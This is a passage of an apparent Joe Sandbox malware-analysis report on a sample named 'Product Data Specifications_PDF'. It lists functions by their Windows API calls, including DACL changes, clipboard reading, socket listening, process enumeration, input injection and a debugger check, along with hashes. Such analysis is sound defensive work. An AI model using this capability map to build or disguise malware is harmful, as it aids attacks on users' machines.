                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                              • CopySid.ADVAPI32(00000000), ref: 00446271
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                              • String ID:
                              • API String ID: 1255039815-0
                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                              Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                              Download Yara Rule
                              APIs
                              • __swprintf.LIBCMT ref: 00433073
                              • __swprintf.LIBCMT ref: 00433085
                              • __wcsicoll.LIBCMT ref: 00433092
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                              • LockResource.KERNEL32(00000000), ref: 004330CA
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                              • LockResource.KERNEL32(?), ref: 00433120
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                              • String ID:
                              • API String ID: 1158019794-0
                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                              Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                              Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                              • GetLastError.KERNEL32 ref: 0045D6BF
                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                              Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_strncmp
                              • String ID: @oH$\$^$h
                              • API String ID: 2175499884-3701065813
                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                              Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocket$bindlistensocket
                              • String ID:
                              • API String ID: 540024437-0
                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                              Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                              • API String ID: 0-2872873767
                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                              Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                              • __wsplitpath.LIBCMT ref: 00475644
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscat.LIBCMT ref: 00475657
                              • __wcsicoll.LIBCMT ref: 0047567B
                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                              • String ID:
                              • API String ID: 2547909840-0
                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                              Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                              • FindClose.KERNEL32(?), ref: 004525FF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                              • String ID: *.*$\VH
                              • API String ID: 2786137511-2657498754
                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                              Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID: pqI
                              • API String ID: 2579439406-2459173057
                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                              Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • __wcsicoll.LIBCMT ref: 00433349
                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                              • __wcsicoll.LIBCMT ref: 00433375
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicollmouse_event
                              • String ID: DOWN
                              • API String ID: 1033544147-711622031
                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                              Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: KeyboardMessagePostState$InputSend
                              • String ID:
                              • API String ID: 3031425849-0
                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                              Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastinet_addrsocket
                              • String ID:
                              • API String ID: 4170576061-0
                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                              Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • IsWindowVisible.USER32 ref: 0047A368
                              • IsWindowEnabled.USER32 ref: 0047A378
                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                              • IsIconic.USER32 ref: 0047A393
                              • IsZoomed.USER32 ref: 0047A3A1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                              Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
